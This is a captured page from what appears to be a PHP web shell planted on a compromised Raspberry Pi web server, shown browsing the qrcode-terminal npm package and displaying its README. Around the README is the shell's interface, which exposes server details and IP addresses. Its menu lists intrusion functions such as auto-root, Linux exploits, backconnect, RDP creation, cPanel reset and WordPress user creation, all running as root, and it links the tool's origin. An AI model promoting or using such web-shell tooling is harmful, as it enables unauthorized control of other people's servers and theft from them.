Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
npm /
node_modules /
qrcode-terminal /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
example
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.travis.yml
38
B
-rw-r--r--
README.md
1.78
KB
-rw-r--r--
package.json
1.82
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# QRCode Terminal Edition [![Build Status][travis-ci-img]][travis-ci-url] > Going where no QRCode has gone before. ![Basic Example][basic-example-img] # Node Library ## Install Can be installed with: $ npm install qrcode-terminal and used: var qrcode = require('qrcode-terminal'); ## Usage To display some data to the terminal just call: qrcode.generate('This will be a QRCode, eh!'); You can even specify the error level (default is 'L'): qrcode.setErrorLevel('Q'); qrcode.generate('This will be a QRCode with error level Q!'); If you don't want to display to the terminal but just want to string you can provide a callback: qrcode.generate('http://github.com', function (qrcode) { console.log(qrcode); }); If you want to display small output, provide `opts` with `small`: qrcode.generate('This will be a small QRCode, eh!', {small: true}); qrcode.generate('This will be a small QRCode, eh!', {small: true}, function (qrcode) { console.log(qrcode) }); # Command-Line ## Install $ npm install -g qrcode-terminal ## Usage $ qrcode-terminal --help $ qrcode-terminal 'http://github.com' # Support - OS X - Linux - Windows # Server-side [node-qrcode][node-qrcode-url] is a popular server-side QRCode generator that renders to a `canvas` object. # Developing To setup the development envrionment run `npm install` To run tests run `npm test` # Contributers Gord Tanner <gtanner@gmail.com> Micheal Brooks <michael@michaelbrooks.ca> [travis-ci-img]: https://travis-ci.org/gtanner/qrcode-terminal.png [travis-ci-url]: https://travis-ci.org/gtanner/qrcode-terminal [basic-example-img]: https://raw.github.com/gtanner/qrcode-terminal/master/example/basic.png [node-qrcode-url]: https://github.com/soldair/node-qrcode
Close